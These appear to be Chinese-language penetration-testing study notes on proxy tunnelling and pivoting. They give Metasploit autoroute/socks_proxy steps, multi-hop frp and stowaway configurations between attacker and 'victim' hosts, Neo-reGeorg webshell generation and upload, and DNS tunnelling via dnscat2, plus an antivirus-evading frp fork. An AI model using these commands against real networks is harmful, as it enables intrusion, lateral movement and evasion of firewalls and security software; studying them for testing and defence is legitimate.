代理
代理
socks
分类
反向代理
代理服务器
理解: 典型例子nginx 用于实现网站的负载均衡,安全防护音隐藏服务器的ip
正向代理
代理客户端
理解: 可以参考clash 并不能代理google,而是通过代理自己从而访问google
工具
msf
核心操作:
- 写路由,通过获取到的meterpreter 进行run autoroute -s ip段,类似于手动添加路由表
- 使用socks_proxy 模块进行代理,只需要使用一次,后续有其他的代理只需要添加路由就可以了
- 总结一下过程,当使用指定的代理端口访问服务的时候,会自动寻找合适的路由,进行转发,这个路由就是meterpreter
frp
组成
frps
- 配置文件:
[conmon]
local_port=
frpc
配置文件:
一级代理:
[server]
server_port=7000
server_ip=192.168.79.137
[socks_proxy]
type=tcp
plugin=socks5
remote_port=20091# 开启代理的端口
二级代理: # 二级代理需要开启frpc和frps,二层代理主要原理是端口转发
frpc.ini
[server]
server_port=7000
server_ip=8.1.1.1
[socks_proxy]
type=tcp
plugin=socks5
remote_port=10000 # 开启代理的端口
[port_fwd]
type=tcp
local_ip=127.0.0.1
local_port=20000 # 本地二层代理的端口
remote_port=20000 #远程二层代理的端口
frps.ini
[server]
server_port=7000
然后三层的主机配置frpc.ini
[server]
server_ip=8.1.1.2
server_port=7000
[socks_proxy]
type=tcp
plugin=socks5
remote_port=20000
二开项目
由于frp不是专门用于渗透,有些时候不免杀,不方便
https://github.com/Goqi/Erfrp
stowaway
一层代理
攻击机
admin -l port -s hack # -s 用于指定密码
等待连接
use
socks port # 开启代理的端口
受害者
agent -c ip:port -s hack
二层代理
在获得了第一个代理之后,进入对应的节点开启
listen port
二层受害者
agent -c ip:port -s hack
http
由于防火墙的原因,会导致这个代理的方式,会被拦截
工具
Neo-reGeorg
通过http 隧道转发到本机
项目地址
https://github.com/sensepost/reGeorg
使用基本逻辑
先生成webshell 木马: python .\neoreg.py generate -k passwd
上传到对应的服务器,然后连接
python .\neoreg.py -k passwd -u http://192.168.79.140/public/tunnel.php
DNS
缺点
访问的速度会慢很多很多
优点
安全性比较高,并且防火墙基本不会拦截dns 的流量
工具
Dnscat2
工具地址:
https://github.com/iagox86/dnscat2.git